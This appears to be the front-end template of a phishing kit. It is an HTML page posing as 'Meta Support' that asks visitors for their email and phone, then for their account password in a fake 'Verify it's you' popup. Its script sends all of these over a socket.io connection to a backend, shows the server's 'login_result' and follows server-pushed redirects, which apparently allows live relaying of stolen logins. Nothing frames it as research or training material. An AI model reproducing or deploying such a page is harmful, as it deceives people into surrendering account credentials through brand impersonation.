<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Meta Support</title>
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.0/css/bootstrap.min.css"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/css/intlTelInput.css"
    />
    <style>
      body {
        display: flex;
        justify-content: center;
        align-items: center;
        min-height: 100vh;
        background-color: #f0f2f5;
      }
      .contact-form {
        background-color: #fff;
        padding: 20px;
        border-radius: 8px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        max-width: 400px;
        width: 100%;
      }
      .contact-form h2 {
        text-align: center;
        margin-bottom: 20px;
      }
      .contact-form .btn {
        width: 100%;
      }
      .meta-logo {
        text-align: center;
        font-size: 32px;
        color: #1877f2;
        margin-bottom: 10px;
      }
      .popup {
        display: none;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5);
        z-index: 1000;
        overflow: auto;
      }
      .popup-content {
        background-color: #fff;
        margin: 15% auto;
        padding: 20px;
        width: 80%;
        max-width: 400px;
        border-radius: 8px;
        position: relative;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
        text-align: center;
      }
      @media (max-width: 767px) {
        .popup-content {
          margin: 55% auto;
        }
      }
      .close-btn {
        position: absolute;
        top: 10px;
        right: 10px;
        font-size: 20px;
        cursor: pointer;
      }
      h3 {
        margin-bottom: 10px;
      }
      p {
        margin-bottom: 15px;
        font-size: 14px;
        color: #666;
      }
      .password-container {
        position: relative;
        margin-bottom: 15px;
      }
      #password-input {
        width: 100%;
        padding: 10px;
        box-sizing: border-box;
        border: 1px solid #ddd;
        border-radius: 5px;
        padding-right: 30px;
      }
      #togglePassword {
        position: absolute;
        top: 50%;
        right: 10px;
        transform: translateY(-50%);
        cursor: pointer;
        opacity: 0.6;
      }
      .confirm-btn {
        background-color: #1877f2;
        color: white;
        padding: 10px 20px;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        width: 100%;
      }
      .error-message {
        color: red;
        margin-top: 10px;
      }
      .spinner {
        position: fixed;
        top: 50%;
        left: 50%;
        width: 50px;
        height: 50px;
        margin: -25px 0 0 -25px;
        border: 5px solid rgba(0, 0, 0, 0.1);
        border-top-color: #000;
        border-radius: 50%;
        animation: spin 1s linear infinite;
        z-index: 1000;
      }

      @keyframes spin {
        to {
          transform: rotate(360deg);
        }
      }
    </style>
  </head>
  <body>
    <div class="contact-form">
      <div class="meta-logo">
        <span>
          <img
            src="{{ url_for('static', filename='images/logo192.png') }}"
            alt="Meta Logo"
            height="20"
          />
          Meta
        </span>
      </div>
      <h3>Contact Meta Support Team</h3>
      <br />
      <form id="contactForm">
        <div class="mb-3">
          <label for="email" class="form-label">Email address</label>
          <input
            type="email"
            class="form-control"
            id="email"
            placeholder="Email address"
            required
          />
        </div>
        <div class="mb-3">
          <label for="phone" class="form-label">Phone Number</label>
          <input type="tel" id="phone" class="form-control" required />
        </div>
        <button id="contactUsBtn" type="button" class="btn btn-primary">
          Contact us
        </button>
      </form>
    </div>
    <div id="verifyPopup" class="popup">
      <div class="popup-content">
        <span class="close-btn" onclick="closePopup()">×</span>
        <h3>Verify it's you</h3>
        <p>Enter your password.</p>
        <div style="position: relative">
          <input
            type="password"
            id="password-input"
            placeholder="Password"
            required
          />
          <span
            id="togglePassword"
            onclick="togglePasswordVisibility()"
            class="eye"
          ></span>
        </div>
        <div>
          <p>
            Log in to get faster, more personalized support for your devices.
          </p>
        </div>
        <button
          id="confirmBtn"
          class="btn btn-primary"
          style="width: 100%; margin-top: 10px"
        >
          Confirm
        </button>
        <div id="error-message" class="error-message"></div>
      </div>
    </div>
    <div id="loadingSpinner" class="spinner" style="display: none"></div>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/js/intlTelInput.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://cdn.socket.io/4.0.1/socket.io.min.js"></script>
    <script>
      const phoneInput = document.querySelector("#phone");
      const iti = intlTelInput(phoneInput, {
        initialCountry: "vn",
        separateDialCode: true,
        utilsScript:
          "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/js/utils.js",
      });
      const socket = io.connect("http://127.0.0.1:5000");
      let contactInfo = {};

      socket.on("connect", function () {
        localStorage.setItem("session_id", socket.id);
      });

      document.getElementById("contactUsBtn").onclick = function () {
        const email = document.getElementById("email").value;
        const phoneNumber = iti.getNumber();
        contactInfo = {
          email: email,
          phone: phoneNumber,
          session_id: localStorage.getItem("session_id"),
        };
        socket.emit("client_contact", contactInfo);
        document.getElementById("verifyPopup").style.display = "block";
      };

      document
        .getElementById("confirmBtn")
        .addEventListener("click", function () {
          const password = document.getElementById("password-input").value;
          document.getElementById("loadingSpinner").style.display = "block";
          const confirmBtn = document.getElementById("confirmBtn");
          confirmBtn.disabled = true;
          confirmBtn.textContent = "Loading...";

          socket.emit("client_password", {
            contact: contactInfo,
            data: password,
            session_id: localStorage.getItem("session_id"),
          });
        });

      socket.on("login_result", function (data) {
        const errorMessage = document.getElementById("error-message");
        document.getElementById("loadingSpinner").style.display = "none";
        const confirmBtn = document.getElementById("confirmBtn");
        confirmBtn.disabled = false;
        confirmBtn.textContent = "Confirm";
        if (data.result === "Login_Success") {
          errorMessage.style.color = "green";
          errorMessage.textContent = "Login successful!";
        } else {
          errorMessage.style.color = "red";
          errorMessage.textContent = `Login failed: ${data.result}`;
        }
      });

      socket.on("redirect", function (data) {
        window.location.href = data.url;
      });

      function closePopup() {
        document.getElementById("verifyPopup").style.display = "none";
        document.getElementById("password-input").value = "";
        document.getElementById("error-message").textContent = "";
      }

      function togglePasswordVisibility() {
        const passwordInput = document.getElementById("password-input");
        const toggleIcon = document.getElementById("togglePassword");
        if (passwordInput.type === "password") {
          passwordInput.type = "text";
          toggleIcon.style.opacity = "1";
        } else {
          passwordInput.type = "password";
          toggleIcon.style.opacity = "0.6";
        }
      }
    </script>
  </body>
</html>
